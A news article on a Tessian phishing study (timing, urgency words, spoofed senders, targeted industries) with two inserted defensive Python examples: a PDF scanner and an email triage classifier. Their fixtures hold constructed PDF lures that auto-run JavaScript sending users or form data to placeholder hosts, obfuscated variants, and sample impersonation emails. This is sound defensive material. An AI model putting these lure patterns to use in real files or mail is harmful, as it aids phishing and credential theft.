
Phishing Attacks More Sophisticated, Malicious Emails Timed To Coincide With Periods of Low Energy and Inattentiveness

The fact that phishing attacks have been on the rise is no secret, but a new study from enterprise security firm Tessian highlights some of the ways in which they are becoming more sophisticated. One of the most interesting items is that malicious emails are now being timed to coincide with the “mid-afternoon slump” common to office workers; cyber criminals are avoiding the 9:00 AM – 1:00 PM period in which studies show employees are most alert, instead delivering messages in the 2:00 PM – 6:00 PM window when energy is waning and suspicious messages may face less scrutiny.

Phishing attacks evolve as detection of malicious emails improves

Tessian drew on about two million malicious emails that its systems flagged between July 2020 and July 2021, all of which had already passed its clients' other automated defenses. The study points out that automated defenses can do little against well-constructed phishing emails of a kind that has not been seen before, which describes most of this sample.

Though some malicious emails are expected to evade the commonly used secure email gateway (SEG) tools that serve as the first line of defense, the number seen in this study indicates that more sophisticated phishing attacks are landing in inboxes than was generally anticipated.

Spearphishing attackers now not only research their target to add details that will inspire confidence and slip past filters, but also keep up with the target's movements (often posted on sites like LinkedIn or personal social media) and time the attack to coincide with when a key decision-maker is out of the office.

The majority of malicious emails also no longer contain attachments, instead trying to trick or manipulate the recipient into clicking on a link to an attack site. Those that still use attachments strongly prefer the PDF file. Not only are PDFs very commonly sent around in organizations, they can carry embedded JavaScript that runs automatically when the document is opened, or an action that sends the recipient's browser to an attack site. The next two most common attachment types are fake image files with .PNG and .JPG extensions. All other file types are relatively rare compared to these three extensions.
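The auto-run behaviour described above lives in a handful of PDF name tokens (/OpenAction, /AA, /JavaScript, /JS, /Launch, /URI). The following added example, which is not part of the Tessian study or the original article, shows the triage check a practitioner would run on an inbound PDF: it counts those tokens, decodes the #xx hex escapes attackers use to hide them from naive string matching, and also inflates FlateDecode streams so a trigger buried in a compressed object stream is still seen. All four PDF fragments are constructed for the example and are not real malware; the example.invalid URLs are placeholders.

```python
import re
import zlib

# Constructed sample PDF fragments for the example (not real malware).
BENIGN_PDF = (b"%PDF-1.4\n"
              b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
              b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
              b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n%%EOF")

# /OpenAction fires the JavaScript action as soon as the document opens.
JS_PDF = (b"%PDF-1.4\n"
          b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
          b"4 0 obj << /S /JavaScript /JS (app.launchURL(\"http://example.invalid/login\", true);) >> endobj\n"
          b"%%EOF")

# Same trigger, with names written as PDF hex escapes (/J#61vaScript) to dodge naive matching.
OBFUSCATED_PDF = (b"%PDF-1.4\n"
                  b"1 0 obj << /Type /Catalog /Open#41ction 4 0 R >> endobj\n"
                  b"4 0 obj << /S /J#61vaScript /J#53 (this.submitForm(\"http://example.invalid/\")) >> endobj\n"
                  b"%%EOF")

# The action dictionary hidden inside a FlateDecode-compressed object stream.
COMPRESSED_PDF = (b"%PDF-1.5\n5 0 obj << /Type /ObjStm /Filter /FlateDecode >>\nstream\n"
                  + zlib.compress(b"<< /S /JavaScript /JS (app.alert(1)) >>")
                  + b"\nendstream\nendobj\n%%EOF")

SUSPICIOUS_NAMES = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch",
                    b"/URI", b"/SubmitForm", b"/EmbeddedFile", b"/RichMedia")


def normalize_names(data: bytes) -> bytes:
    """Decode #xx hex escapes so /J#61vaScript becomes /JavaScript (applied to the whole
    buffer for simplicity; we only count tokens, so touching stream bytes is harmless)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Return the concatenated contents of every stream that inflates cleanly with zlib."""
    out = []
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            out.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # not Flate-compressed (or damaged); raw bytes were scanned already
    return b"".join(out)


def scan_pdf(data: bytes) -> dict:
    """Count suspicious name tokens in the raw file plus any inflated stream contents."""
    text = normalize_names(data) + normalize_names(inflate_streams(data))
    counts = {}
    for name in SUSPICIOUS_NAMES:
        # Require a delimiter after the name so /JS does not also count /JSfoo-style names.
        n = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", text))
        if n:
            counts[name.decode()] = n
    return counts


def is_suspicious(data: bytes) -> bool:
    """Flag JavaScript or Launch anywhere, or an auto-trigger paired with any action type."""
    c = scan_pdf(data)
    trigger = "/OpenAction" in c or "/AA" in c
    action = any(k in c for k in ("/JavaScript", "/JS", "/Launch", "/URI", "/SubmitForm"))
    return (trigger and action) or "/JavaScript" in c or "/Launch" in c


if __name__ == "__main__":
    for label, pdf in [("benign", BENIGN_PDF), ("openaction+js", JS_PDF),
                       ("hex-obfuscated", OBFUSCATED_PDF), ("compressed", COMPRESSED_PDF)]:
        print(f"{label:15} suspicious={is_suspicious(pdf)} tokens={scan_pdf(pdf)}")
```

A /URI alone is normal in benign documents (hyperlinks), which is why it only counts when paired with an auto-trigger; a real pipeline would also parse the object tree rather than pattern-match, but token counting of this kind is what tools in the pdfid family do and catches the bulk of commodity lures.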

It’s all about timing when it comes to success rate

Phishing attacks are also now widely adopting one of the key elements of the business email compromise attack: pressure and urgency on the target. Tessian surveyed employees of clients who had clicked on a malicious email: 45% said they did it because they were distracted, 52% said that they are prone to make more mistakes when under stress, and 29% said they weren’t paying attention when they clicked on the email.

Automated defenses can greatly cut down on the number of phishing attacks that slip through, but ultimately the key factor is employee attention and security awareness training to notice things that are out of the ordinary and avoid clicking on malicious links and attachments. Tessian finds that most malicious emails are now sent between 2 PM and 6 PM, when employees can be expected to be at their least vigilant: tired after a long day of work, digesting a big lunch, one foot already out the door mentally, and so on.

Phishers also seem to keep office hours, though they turn out in force around retail holidays. Malicious emails really ramp up in October, as the holiday shopping season begins. Phishing attacks hit their absolute peak on Black Friday. They then fall precipitously as Christmas approaches, all but disappearing on New Year's Day. They also lull a bit in the summer months before jumping back up in September.

Use of pressure and stress as psychological tactic in phishing attacks

The words most commonly used in phishing attacks also point to the common adoption of pressure and stress as a psychological tactic. “New,” “update” and “security” are among the words that most frequently appear in subject lines of malicious emails. “Immediately,” “now” and “payment” are favorites to use in the body copy.

Scammers are also commonly making use of Covid-19 as an element of phishing attacks, and also like to use fake “unsubscribe” links.

Generic email accounts still used in most phishing attacks

Most phishing attacks (60%) still come from generic email accounts, easily made with services such as Gmail. Most of these will at least set a display name that appears to be legitimate and connected to the company in some way, however. The remaining 40% use a variety of more advanced techniques: 13% spoof legitimate sender addresses by altering email headers, and 11.25% come from a custom domain set up by the attackers to look like a legitimate company.

Those among the more advanced impersonators have some favorites that they tend to go to. Attackers most frequently impersonate Microsoft, ADP Security, Amazon, Adobe Sign, and Zoom.
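The three sender patterns above (free-mail account with a borrowed display name, altered headers, look-alike domain), the urgency vocabulary from the previous section and the 2 PM to 6 PM delivery window are all checkable at the mail gateway. The following added example, which is not code from Tessian or from the original article, triages a handful of constructed messages on exactly those signals. It assumes a hypothetical recipient organisation at example.com, assumes the real domains for the five most-impersonated brands, and uses the Return-Path header as the envelope sender (in practice you would also read SPF/DKIM results from Authentication-Results). The sample messages and example.invalid URLs are constructed for the example.

```python
import re
from email import message_from_string
from email.utils import parseaddr, parsedate_to_datetime

OUR_DOMAIN = "example.com"  # hypothetical recipient organisation
FREEMAIL = {"gmail.com", "outlook.com", "yahoo.com", "hotmail.com", "protonmail.com"}
# Brands the report lists as most impersonated; the genuine domains are assumed here.
PROTECTED = {"microsoft": "microsoft.com", "adp": "adp.com", "amazon": "amazon.com",
             "adobe": "adobe.com", "zoom": "zoom.us"}
SUBJECT_WORDS = ("new", "update", "security")    # subject-line favourites from the report
BODY_WORDS = ("immediately", "now", "payment")   # body-copy favourites from the report


def skeleton(label: str) -> str:
    """Collapse common look-alike substitutions so 'rnicros0ft' compares equal to 'microsoft'."""
    return label.lower().replace("rn", "m").replace("vv", "w").translate(str.maketrans("01", "ol"))


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_brand(domain: str):
    """Return the brand a sender domain imitates, or None for the genuine domain or no match."""
    domain = domain.lower()
    if any(domain == real or domain.endswith("." + real) for real in PROTECTED.values()):
        return None
    parts = domain.split(".")
    label = skeleton(parts[-2] if len(parts) >= 2 else parts[0])
    for brand in PROTECTED:
        # Near-exact label (rnicrosoft.com) or brand used as a token (micros0ft-login.com).
        # Short brand names such as 'adp' are noisier under an edit distance of 1.
        if levenshtein(label, brand) <= 1 or brand in label.split("-"):
            return brand
    return None


def classify_sender(msg) -> str:
    name, addr = parseaddr(msg.get("From", ""))
    domain = addr.rpartition("@")[2].lower()
    rp_domain = parseaddr(msg.get("Return-Path", ""))[1].rpartition("@")[2].lower()
    claims_trusted = domain == OUR_DOMAIN or domain in PROTECTED.values()
    if claims_trusted and rp_domain and rp_domain != domain:
        return "spoofed-header"  # From claims a trusted domain, bounce path goes elsewhere
    if domain == OUR_DOMAIN:
        return "internal"
    if domain in FREEMAIL:
        borrowed = [b for b in list(PROTECTED) + [OUR_DOMAIN.split(".")[0]] if b in name.lower()]
        return "freemail-impersonation" if borrowed else "freemail"
    brand = lookalike_brand(domain)
    return f"lookalike-domain:{brand}" if brand else "other"


def urgency_hits(msg) -> list:
    subject = msg.get("Subject", "").lower()
    body = "" if msg.is_multipart() else msg.get_payload(decode=True).decode("utf-8", "replace").lower()
    return ([w for w in SUBJECT_WORDS if re.search(rf"\b{w}\b", subject)]
            + [w for w in BODY_WORDS if re.search(rf"\b{w}\b", body)])


def in_slump_window(msg) -> bool:
    """2 PM to 6 PM by the Date header's own clock; production code converts to recipient local time."""
    return 14 <= parsedate_to_datetime(msg["Date"]).hour < 18


def triage(raw: str) -> dict:
    msg = message_from_string(raw)
    sender, hits, slump = classify_sender(msg), urgency_hits(msg), in_slump_window(msg)
    score = 2 * (sender not in ("internal", "other", "freemail")) + min(len(hits), 3) + slump
    return {"sender": sender, "urgency": hits, "slump_window": slump, "score": score}


# Constructed sample messages (not real mail).
SAMPLES = [
    'From: "Microsoft Account Team" <msoft.support.desk@gmail.com>\nReturn-Path: <msoft.support.desk@gmail.com>\n'
    "Subject: Security update required\nDate: Tue, 12 Oct 2021 15:07:00 -0400\nContent-Type: text/plain\n\n"
    "Your password expires now. Verify immediately at http://example.invalid/login\n",
    'From: "Amazon Billing" <billing@arnazon-payments.com>\nSubject: Payment failed: update your card\n'
    "Date: Fri, 26 Nov 2021 16:30:00 +0000\nContent-Type: text/plain\n\n"
    "Update your payment details now or your account is suspended.\n",
    'From: "Pat Example" <ceo@example.com>\nReturn-Path: <bounce@mailer.example.net>\n'
    "Subject: Urgent wire transfer\nDate: Wed, 13 Oct 2021 10:30:00 -0400\nContent-Type: text/plain\n\n"
    "I need a payment sent now, I'm out of the office.\n",
    'From: "Jane Doe" <jane@example.com>\nReturn-Path: <jane@example.com>\nSubject: Lunch on Friday?\n'
    "Date: Thu, 14 Oct 2021 11:00:00 -0400\nContent-Type: text/plain\n\nShall we try the new place?\n",
]

if __name__ == "__main__":
    for raw in SAMPLES:
        print(triage(raw))
```

The sender class is weighted above the wording because the report's own numbers say 60% of lures are plain free-mail accounts whose only tell is the display name; the urgency words and the afternoon window are corroborating signals, useful for prioritising analyst review rather than for blocking on their own.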

Retail industry most frequently targeted

Phishing attacks are more frequent with specific industries as well. Retail is attacked far more than any other industry. Manufacturing and food & beverage are attacked 3x more often than most other industries. Other frequent targets include research & development, tech, real estate, legal & professional services and financial services. Legal & professional services are compromised more often than any other industry, followed by financial services and tech.

The targets of phishing attacks also vary with the intent of the attacker. Other studies have shown that ransomware attackers have an increasing preference for large organizations with the ability to pay up. But phishing campaigns looking to impersonate executives and initiate transfers of funds don’t care so much about company size, according to Tessian.